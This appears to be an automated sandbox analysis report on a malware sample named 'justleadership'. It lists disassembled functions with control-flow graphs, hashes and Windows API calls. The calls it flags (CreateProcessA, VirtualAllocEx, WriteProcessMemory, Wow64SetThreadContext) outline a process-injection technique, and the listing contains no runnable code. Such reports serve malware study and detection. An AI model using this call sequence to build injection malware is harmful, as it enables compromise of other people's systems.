                                              Similarity
                                              • API ID:
                                              • String ID: (oq$(oq$(oq$(oq$(oq
                                              • API String ID: 0-2863283648
                                              • Opcode ID: 538c16298b534b48b880fdc3abf3464d6602ae63949318d69a828f78c61af43e
                                              • Instruction ID: 332ac9a738912af3b5a3f4a1fb60610d074683c3018a2b714ef5a466f2af1731
                                              • Opcode Fuzzy Hash: 538c16298b534b48b880fdc3abf3464d6602ae63949318d69a828f78c61af43e
                                              • Instruction Fuzzy Hash: EFC1E0327002558FDB55EF29D850AAE7BA6FFC5350B25816AE905CF392CE34DC02C7A1
                                              Function 06D37A54 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1496 6d37a54-6d37ad0 1499 6d37ad2-6d37adc 1496->1499 1500 6d37b09-6d37b29 1496->1500 1499->1500 1501 6d37ade-6d37ae0 1499->1501 1505 6d37b62-6d37b9c 1500->1505 1506 6d37b2b-6d37b35 1500->1506 1503 6d37b03-6d37b06 1501->1503 1504 6d37ae2-6d37aec 1501->1504 1503->1500 1507 6d37af0-6d37aff 1504->1507 1508 6d37aee 1504->1508 1514 6d37bd5-6d37c4a CreateProcessA 1505->1514 1515 6d37b9e-6d37ba8 1505->1515 1506->1505 1510 6d37b37-6d37b39 1506->1510 1507->1507 1509 6d37b01 1507->1509 1508->1507 1509->1503 1511 6d37b3b-6d37b45 1510->1511 1512 6d37b5c-6d37b5f 1510->1512 1516 6d37b47 1511->1516 1517 6d37b49-6d37b58 1511->1517 1512->1505 1527 6d37c53-6d37c9b 1514->1527 1528 6d37c4c-6d37c52 1514->1528 1515->1514 1518 6d37baa-6d37bac 1515->1518 1516->1517 1517->1517 1519 6d37b5a 1517->1519 1520 6d37bcf-6d37bd2 1518->1520 1521 6d37bae-6d37bb8 1518->1521 1519->1512 1520->1514 1523 6d37bba 1521->1523 1524 6d37bbc-6d37bcb 1521->1524 1523->1524 1524->1524 1525 6d37bcd 1524->1525 1525->1520 1533 6d37cab-6d37caf 1527->1533 1534 6d37c9d-6d37ca1 1527->1534 1528->1527 1535 6d37cb1-6d37cb5 1533->1535 1536 6d37cbf-6d37cc3 1533->1536 1534->1533 1537 6d37ca3 1534->1537 1535->1536 1538 6d37cb7 1535->1538 1539 6d37cd3 1536->1539 1540 6d37cc5-6d37cc9 1536->1540 1537->1533 1538->1536 1542 6d37cd4 1539->1542 1540->1539 1541 6d37ccb 1540->1541 1541->1539 1542->1542
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D37C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: i\w$i\w
                                              • API String ID: 963392458-3622730961
                                              • Opcode ID: c364cb169de7cf00778bf0cc8a72def79c02824c84f95be7991d7db8ee5fa71d
                                              • Instruction ID: 8b1d34e0c5de0f3365bbff4313a7bc04fb3cf7d7229e80a8ba38f1440571de32
                                              • Opcode Fuzzy Hash: c364cb169de7cf00778bf0cc8a72def79c02824c84f95be7991d7db8ee5fa71d
                                              • Instruction Fuzzy Hash: D98147B1D00A299FDB50CFA9C9817DEBBF2BF48310F148529E859EB294D7748881CF95
                                              Function 06D37A60 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1543 6d37a60-6d37ad0 1545 6d37ad2-6d37adc 1543->1545 1546 6d37b09-6d37b29 1543->1546 1545->1546 1547 6d37ade-6d37ae0 1545->1547 1551 6d37b62-6d37b9c 1546->1551 1552 6d37b2b-6d37b35 1546->1552 1549 6d37b03-6d37b06 1547->1549 1550 6d37ae2-6d37aec 1547->1550 1549->1546 1553 6d37af0-6d37aff 1550->1553 1554 6d37aee 1550->1554 1560 6d37bd5-6d37c4a CreateProcessA 1551->1560 1561 6d37b9e-6d37ba8 1551->1561 1552->1551 1556 6d37b37-6d37b39 1552->1556 1553->1553 1555 6d37b01 1553->1555 1554->1553 1555->1549 1557 6d37b3b-6d37b45 1556->1557 1558 6d37b5c-6d37b5f 1556->1558 1562 6d37b47 1557->1562 1563 6d37b49-6d37b58 1557->1563 1558->1551 1573 6d37c53-6d37c9b 1560->1573 1574 6d37c4c-6d37c52 1560->1574 1561->1560 1564 6d37baa-6d37bac 1561->1564 1562->1563 1563->1563 1565 6d37b5a 1563->1565 1566 6d37bcf-6d37bd2 1564->1566 1567 6d37bae-6d37bb8 1564->1567 1565->1558 1566->1560 1569 6d37bba 1567->1569 1570 6d37bbc-6d37bcb 1567->1570 1569->1570 1570->1570 1571 6d37bcd 1570->1571 1571->1566 1579 6d37cab-6d37caf 1573->1579 1580 6d37c9d-6d37ca1 1573->1580 1574->1573 1581 6d37cb1-6d37cb5 1579->1581 1582 6d37cbf-6d37cc3 1579->1582 1580->1579 1583 6d37ca3 1580->1583 1581->1582 1584 6d37cb7 1581->1584 1585 6d37cd3 1582->1585 1586 6d37cc5-6d37cc9 1582->1586 1583->1579 1584->1582 1588 6d37cd4 1585->1588 1586->1585 1587 6d37ccb 1586->1587 1587->1585 1588->1588
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D37C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: i\w$i\w
                                              • API String ID: 963392458-3622730961
                                              • Opcode ID: 777716fb92f29da9aed5db14ca2ce45f540166678984e16d52c8246f724d7ade
                                              • Instruction ID: 319fa051dda3b23ba6a5c46074ec863cd21023deeea20e2ec6f3919163b0a624
                                              • Opcode Fuzzy Hash: 777716fb92f29da9aed5db14ca2ce45f540166678984e16d52c8246f724d7ade
                                              • Instruction Fuzzy Hash: BC8137B1D00A699FDB50CFA9C9817DEBBF2BF48310F148529E859EB244D7748881CF95
                                              Function 06E8F478 Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1589 6e8f478-6e8f4a0 1591 6e8f4ee-6e8f4fc 1589->1591 1592 6e8f4a2-6e8f4e9 1589->1592 1593 6e8f50b 1591->1593 1594 6e8f4fe-6e8f509 1591->1594 1636 6e8f945-6e8f94c 1592->1636 1595 6e8f50d-6e8f514 1593->1595 1594->1595 1598 6e8f51a-6e8f51e 1595->1598 1599 6e8f5fd-6e8f601 1595->1599 1603 6e8f94d-6e8f975 1598->1603 1604 6e8f524-6e8f528 1598->1604 1601 6e8f603-6e8f612 1599->1601 1602 6e8f657-6e8f661 1599->1602 1615 6e8f616-6e8f61b 1601->1615 1605 6e8f69a-6e8f6c0 1602->1605 1606 6e8f663-6e8f672 1602->1606 1609 6e8f97c-6e8f9a6 1603->1609 1607 6e8f53a-6e8f598 1604->1607 1608 6e8f52a-6e8f534 1604->1608 1632 6e8f6cd 1605->1632 1633 6e8f6c2-6e8f6cb 1605->1633 1619 6e8f678-6e8f695 1606->1619 1620 6e8f9ae-6e8f9c4 1606->1620 1646 6e8fa0b-6e8fa35 1607->1646 1647 6e8f59e-6e8f5f8 1607->1647 1608->1607 1608->1609 1609->1620 1621 6e8f61d-6e8f652 call 6e8f348 1615->1621 1622 6e8f614 1615->1622 1619->1636 1644 6e8f9cc-6e8fa04 1620->1644 1621->1636 1622->1615 1634 6e8f6cf-6e8f6f7 1632->1634 1633->1634 1650 6e8f7c8-6e8f7cc 1634->1650 1651 6e8f6fd-6e8f716 1634->1651 1644->1646 1656 6e8fa3f-6e8fa45 1646->1656 1657 6e8fa37-6e8fa3d 1646->1657 1647->1636 1654 6e8f7ce-6e8f7e7 1650->1654 1655 6e8f846-6e8f850 1650->1655 1651->1650 1676 6e8f71c-6e8f72b 1651->1676 1654->1655 1681 6e8f7e9-6e8f7f8 1654->1681 1659 6e8f8ad-6e8f8b6 1655->1659 1660 6e8f852-6e8f85c 1655->1660 1657->1656 1663 6e8fa46-6e8fa83 1657->1663 1665 6e8f8b8-6e8f8e6 1659->1665 1666 6e8f8ee-6e8f93b 1659->1666 1674 6e8f85e-6e8f860 1660->1674 1675 6e8f862-6e8f874 1660->1675 1665->1666 1686 6e8f943 1666->1686 1682 6e8f876-6e8f878 1674->1682 1675->1682 1694 6e8f72d-6e8f733 1676->1694 1695 6e8f743-6e8f758 1676->1695 1700 6e8f7fa-6e8f800 1681->1700 1701 6e8f810-6e8f81b 1681->1701 1684 6e8f87a-6e8f87e 1682->1684 1685 6e8f8a6-6e8f8ab 1682->1685 1690 6e8f89c-6e8f89f 1684->1690 1691 6e8f880-6e8f899 1684->1691 1685->1659 1685->1660 1686->1636 1690->1685 1691->1690 1702 6e8f735 1694->1702 1703 6e8f737-6e8f739 1694->1703 1698 6e8f75a-6e8f786 1695->1698 1699 6e8f78c-6e8f795 1695->1699 1698->1644 1698->1699 1699->1646 1707 6e8f79b-6e8f7c2 1699->1707 1708 6e8f802 1700->1708 1709 6e8f804-6e8f806 1700->1709 1701->1646 1704 6e8f821-6e8f844 1701->1704 1702->1695 1703->1695 1704->1655 1704->1681 1707->1650 1707->1676 1708->1701 1709->1701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Hoq$Hoq$Hoq
                                              • API String ID: 0-3310881576
                                              • Opcode ID: f0a47549dbe59397a384264a0898aa86a04c7721b9d41300b8f747d0f03b3ee2
                                              • Instruction ID: 5156a221ee3d10ad6555d24b79aca310c8a279630b80b352726760c22680fc5b
                                              • Opcode Fuzzy Hash: f0a47549dbe59397a384264a0898aa86a04c7721b9d41300b8f747d0f03b3ee2
                                              • Instruction Fuzzy Hash: A8126B31A003058FCB65EFA9D884A6EB7F2FF88344B14856DD50A9B394DB31EC46CB90
                                              Function 06B614B8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1720 6b614b8-6b614f5 1722 6b61517-6b6152d call 6b612c0 1720->1722 1723 6b614f7-6b614fa 1720->1723 1729 6b618a3-6b618b7 1722->1729 1730 6b61533-6b6153f 1722->1730 1834 6b614fc call 6b61dd0 1723->1834 1835 6b614fc call 6b61e28 1723->1835 1725 6b61502-6b61504 1725->1722 1727 6b61506-6b6150e 1725->1727 1727->1722 1737 6b618f7-6b61900 1729->1737 1731 6b61545-6b61548 1730->1731 1732 6b61670-6b61677 1730->1732 1735 6b6154b-6b61554 1731->1735 1733 6b617a6-6b617e3 call 6b60cc8 call 6b63c70 1732->1733 1734 6b6167d-6b61686 1732->1734 1778 6b617e9-6b6189a call 6b60cc8 1733->1778 1734->1733 1738 6b6168c-6b61798 call 6b60cc8 call 6b61258 call 6b60cc8 1734->1738 1740 6b6155a-6b6156e 1735->1740 1741 6b61998 1735->1741 1742 6b618c5-6b618ce 1737->1742 1743 6b61902-6b61909 1737->1743 1831 6b617a3 1738->1831 1832 6b6179a 1738->1832 1751 6b61574-6b61609 call 6b612c0 * 2 call 6b60cc8 call 6b61258 call 6b61300 call 6b613a8 call 6b61410 1740->1751 1752 6b61660-6b6166a 1740->1752 1750 6b6199d-6b619a1 1741->1750 1742->1741 1746 6b618d4-6b618e6 1742->1746 1748 6b61957-6b6195e 1743->1748 1749 6b6190b-6b6194e call 6b60cc8 1743->1749 1766 6b618f6 1746->1766 1767 6b618e8-6b618ed 1746->1767 1753 6b61983-6b61996 1748->1753 1754 6b61960-6b61970 1748->1754 1749->1748 1757 6b619a3 1750->1757 1758 6b619ac 1750->1758 1810 6b6160b-6b61623 call 6b613a8 call 6b60cc8 call 6b60f78 1751->1810 1811 6b61628-6b6165b call 6b61410 1751->1811 1752->1732 1752->1735 1753->1750 1754->1753 1770 6b61972-6b6197a 1754->1770 1757->1758 1765 6b619ad 1758->1765 1765->1765 1766->1737 1836 6b618f0 call 6b64410 1767->1836 1837 6b618f0 call 6b64401 1767->1837 1770->1753 1778->1729 1810->1811 1811->1752 1831->1733 1832->1831 1834->1725 1835->1725 1836->1766 1837->1766
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq$4'kq$4'kq
                                              • API String ID: 0-2478202913
                                              • Opcode ID: 4bb50e5af2d26633959f9f2253d06c9201f59f3eaef6a66b464193d8a006758b
                                              • Instruction ID: 92f3e50ff4c61065becbe319f68d4d1c5e48ca229ee2908ef96dbf6b77340f98
                                              • Opcode Fuzzy Hash: 4bb50e5af2d26633959f9f2253d06c9201f59f3eaef6a66b464193d8a006758b
                                              • Instruction Fuzzy Hash: 3DF1FB74A00218CFCB44EFA9D994E9DB7B2FF89301F158199E506AB3A5DB74EC42CB50
                                              Function 06B65AA0 Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1838 6b65aa0-6b65ab0 1839 6b65ab6-6b65aba 1838->1839 1840 6b65bc9-6b65bee 1838->1840 1841 6b65bf5-6b65c1a 1839->1841 1842 6b65ac0-6b65ac9 1839->1842 1840->1841 1843 6b65c21-6b65c57 1841->1843 1842->1843 1844 6b65acf-6b65af6 1842->1844 1860 6b65c5e-6b65cb4 1843->1860 1855 6b65bbe-6b65bc8 1844->1855 1856 6b65afc-6b65afe 1844->1856 1858 6b65b00-6b65b03 1856->1858 1859 6b65b1f-6b65b21 1856->1859 1858->1860 1861 6b65b09-6b65b13 1858->1861 1862 6b65b24-6b65b28 1859->1862 1876 6b65cb6-6b65ccd call 6b661b8 1860->1876 1877 6b65cd8-6b65cef 1860->1877 1861->1860 1864 6b65b19-6b65b1d 1861->1864 1865 6b65b2a-6b65b39 1862->1865 1866 6b65b89-6b65b95 1862->1866 1864->1859 1864->1862 1865->1860 1871 6b65b3f-6b65b86 1865->1871 1866->1860 1867 6b65b9b-6b65bb8 1866->1867 1867->1855 1867->1856 1871->1866 1882 6b65cd3 1876->1882 1886 6b65cf5-6b65ddb call 6b612c0 call 6b60cc8 * 2 call 6b61300 call 6b64ad8 call 6b60cc8 call 6b63c70 call 6b61b68 1877->1886 1887 6b65de0-6b65df0 1877->1887 1884 6b65f03-6b65f0e 1882->1884 1896 6b65f10-6b65f20 1884->1896 1897 6b65f3d-6b65f5e call 6b61410 1884->1897 1886->1887 1894 6b65df6-6b65ed0 call 6b612c0 * 2 call 6b61a78 call 6b60cc8 * 2 call 6b60f78 call 6b61410 call 6b60cc8 1887->1894 1895 6b65ede-6b65efa call 6b60cc8 1887->1895 1949 6b65ed2 1894->1949 1950 6b65edb 1894->1950 1895->1884 1909 6b65f22-6b65f28 1896->1909 1910 6b65f30-6b65f38 call 6b61b68 1896->1910 1909->1910 1910->1897 1949->1950 1950->1895
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq$(oq$Hoq
                                              • API String ID: 0-3836682603
                                              • Opcode ID: fd34992ce68c85e9d2e5946352b2dc1e34dc8717b22a81c765e79e9ed0b95677
                                              • Instruction ID: 8ce22bf8b5665ab1c1c0cf71bc1ba1c351a62f7ce97c313fac29d66c1769bcb3
                                              • Opcode Fuzzy Hash: fd34992ce68c85e9d2e5946352b2dc1e34dc8717b22a81c765e79e9ed0b95677
                                              • Instruction Fuzzy Hash: 47E15574A00209DFCB54EF69D49499EBBB2FF89300F158569F906AB364DB34EC45CB90
                                              Function 0173A928 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2059 173a928-173a937 2060 173a963-173a967 2059->2060 2061 173a939-173a946 call 17390a8 2059->2061 2063 173a97b-173a9bc 2060->2063 2064 173a969-173a973 2060->2064 2067 173a948 2061->2067 2068 173a95c 2061->2068 2070 173a9c9-173a9d7 2063->2070 2071 173a9be-173a9c6 2063->2071 2064->2063 2115 173a94e call 173afc0 2067->2115 2116 173a94e call 173afb0 2067->2116 2068->2060 2072 173a9fb-173a9fd 2070->2072 2073 173a9d9-173a9de 2070->2073 2071->2070 2078 173aa00-173aa07 2072->2078 2075 173a9e0-173a9e7 call 1739cb8 2073->2075 2076 173a9e9 2073->2076 2074 173a954-173a956 2074->2068 2077 173aa98-173ab58 2074->2077 2080 173a9eb-173a9f9 2075->2080 2076->2080 2110 173ab60-173ab8b GetModuleHandleW 2077->2110 2111 173ab5a-173ab5d 2077->2111 2081 173aa14-173aa1b 2078->2081 2082 173aa09-173aa11 2078->2082 2080->2078 2083 173aa28-173aa31 call 1739cc8 2081->2083 2084 173aa1d-173aa25 2081->2084 2082->2081 2090 173aa33-173aa3b 2083->2090 2091 173aa3e-173aa43 2083->2091 2084->2083 2090->2091 2092 173aa61-173aa6e 2091->2092 2093 173aa45-173aa4c 2091->2093 2100 173aa91-173aa97 2092->2100 2101 173aa70-173aa8e 2092->2101 2093->2092 2095 173aa4e-173aa5e call 1739cd8 call 1739ce8 2093->2095 2095->2092 2101->2100 2112 173ab94-173aba8 2110->2112 2113 173ab8d-173ab93 2110->2113 2111->2110 2113->2112 2115->2074 2116->2074
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0173AB7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: i\w
                                              • API String ID: 4139908857-1682270839
                                              • Opcode ID: 6440f3455d8120566ee05d9b492219628b6ba8b41e923c4a7a66f4b90fc8aaa6
                                              • Instruction ID: bd4f3991e23c9e3b6e3d8e7c827683bee92a481547ad589d761d061fbcf192e3
                                              • Opcode Fuzzy Hash: 6440f3455d8120566ee05d9b492219628b6ba8b41e923c4a7a66f4b90fc8aaa6
                                              • Instruction Fuzzy Hash: 86815270A00B058FDB24DF2AC54579ABBF1BF88304F008A2DD58AD7B51DB75E945CB90
                                              Function 06D3827B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2117 6d3827b-6d382ce 2119 6d382d0-6d382dc 2117->2119 2120 6d382de-6d3831d WriteProcessMemory 2117->2120 2119->2120 2122 6d38326-6d38356 2120->2122 2123 6d3831f-6d38325 2120->2123 2123->2122
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D38310
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: i\w
                                              • API String ID: 3559483778-1682270839
                                              • Opcode ID: 400d034a7fd2a4be013e3b4ba050f852a26c49ccfd705077bc2a22f3e8e625a6
                                              • Instruction ID: b95a2920644e0499a90f4aa41693d24af8623b09613d16dd0612feb1c97442b0
                                              • Opcode Fuzzy Hash: 400d034a7fd2a4be013e3b4ba050f852a26c49ccfd705077bc2a22f3e8e625a6
                                              • Instruction Fuzzy Hash: FA2135B5900259DFCB10CFAAC980BDEBBF5FF48310F10842AE958A7250C7789944DBA0
                                              Function 06D38280 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D38310
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: i\w
                                              • API String ID: 3559483778-1682270839
                                              • Opcode ID: 349812caf13d466a9e96e209d8c982f3e1932c3c7d4692f37d35b89b80fa4d8f
                                              • Instruction ID: 170243ada9d25b02200bac279133c73ab83cfef2f8a5574a17a774ee7365055f
                                              • Opcode Fuzzy Hash: 349812caf13d466a9e96e209d8c982f3e1932c3c7d4692f37d35b89b80fa4d8f
                                              • Instruction Fuzzy Hash: 432124B59003599FCB10DFAAC985BDEBBF5FF48320F10842AE958A7250C7789944DBA4
                                              Function 06D37D5B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D37DDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: i\w
                                              • API String ID: 983334009-1682270839
                                              • Opcode ID: 2aadeb8206bd3dd05ed7e2d099d555cea39fc875dfb73ba3237abaefaf9380c8
                                              • Instruction ID: 637d75dbefceaac2d9abda00e5d4938dbe06f13bb79c770c0c2a2abb9e5e467a
                                              • Opcode Fuzzy Hash: 2aadeb8206bd3dd05ed7e2d099d555cea39fc875dfb73ba3237abaefaf9380c8
                                              • Instruction Fuzzy Hash: 8F2159B1D00219CFDB10CFAAD5847EEBBF4EF88320F24842AD459A7240CB789545CFA4
                                              Function 0173CF18 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173CFA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: i\w
                                              • API String ID: 3793708945-1682270839
                                              • Opcode ID: 9a74fad76b7bd6b964139797e3e3e28d55c4073e50e4b6fb6adf8aa66c28a58f
                                              • Instruction ID: 3740544c9517b077542e979d38b0873d27d240a3f4fc57fba7641e3e63ee70d1
                                              • Opcode Fuzzy Hash: 9a74fad76b7bd6b964139797e3e3e28d55c4073e50e4b6fb6adf8aa66c28a58f
                                              • Instruction Fuzzy Hash: 7D21D4B5900219EFDB10CF9AD584ADEFBF4EB48310F14841AE914A7251D378AA54CF65
                                              Function 06D37D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D37DDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: i\w
                                              • API String ID: 983334009-1682270839
                                              • Opcode ID: 3014f84c2b6d6dad77f90cd36d4abd132dd653fcaf2f905eb074ab0a17642665
                                              • Instruction ID: 132ede7e74b865a4b0aacb6b5c02a91f475e4a3d342759ae2b6a4fd546aadffd
                                              • Opcode Fuzzy Hash: 3014f84c2b6d6dad77f90cd36d4abd132dd653fcaf2f905eb074ab0a17642665
                                              • Instruction Fuzzy Hash: 6E2104B1D002198FDB10DFAAC5857EEBBF4EB88324F14842AD459A7240DB78A944CFA4
                                              Function 0173CF20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173CFA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: i\w
                                              • API String ID: 3793708945-1682270839
                                              • Opcode ID: f2449cc5c716d0365bb6c3f14bd8f0fdb533687625b485700bb4d195d3b4bc9d
                                              • Instruction ID: 42bd4552cf1f4e517d85d21fd1ac3f3cd21a6444759f0a331beba494ab6f0b11
                                              • Opcode Fuzzy Hash: f2449cc5c716d0365bb6c3f14bd8f0fdb533687625b485700bb4d195d3b4bc9d
                                              • Instruction Fuzzy Hash: 5921E4B5900249DFDB10CF9AD584ADEFFF8EB48310F14841AE914A3350C374A940CFA5
                                              Function 06C0D488 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C0D4FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2162463060.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c00000_justleadership.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: i\w
                                              • API String ID: 544645111-1682270839
                                              • Opcode ID: fb28cd112b5caf771ced3865fea00857275a8023845ebf04e5666ebf99457386
                                              • Instruction ID: 3aaf950541c8ba8adb26edc7e4a40f2939ebe56eac00d7a754acd36e5e6ab928
                                              • Opcode Fuzzy Hash: fb28cd112b5caf771ced3865fea00857275a8023845ebf04e5666ebf99457386
                                              • Instruction Fuzzy Hash: 221106B1D002499FDB10DFAAC944BDEFBF8EF48320F10842AD459A7250C775A944CFA5
                                              Function 06D3407A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,BF3B6406), ref: 06D340EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: i\w
                                              • API String ID: 3472027048-1682270839
                                              • Opcode ID: a75bd7fcbdd4cb457aae6763c62019c19e029ac2bea8e88d0172e3f13dee2022
                                              • Instruction ID: 1268a32f038be92bfe2fb3d5932a73e12dde0d8f05520bbed0af3050c794488f
                                              • Opcode Fuzzy Hash: a75bd7fcbdd4cb457aae6763c62019c19e029ac2bea8e88d0172e3f13dee2022
                                              • Instruction Fuzzy Hash: 5D114CB1D003598FDB10DFAAC4457EFFFF8AF48320F14842AD455A7250CA399984CBA4
                                              Function 06D38178 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D381EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: i\w
                                              • API String ID: 4275171209-1682270839
                                              • Opcode ID: 80091ea6ba75833568ceffe5697c7239a41f42a5706322bde25aab466da4671d
                                              • Instruction ID: c5325ef636828941ad66375477172161c07ee2beb54b4ac0b7a1b5453150ca47
                                              • Opcode Fuzzy Hash: 80091ea6ba75833568ceffe5697c7239a41f42a5706322bde25aab466da4671d
                                              • Instruction Fuzzy Hash: B61159719002499FCB10DFAAC845BDEBFF5EF48320F20881AE555A7250C735A540DFA4
                                              Function 01739429 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0173949D
                                              Strings
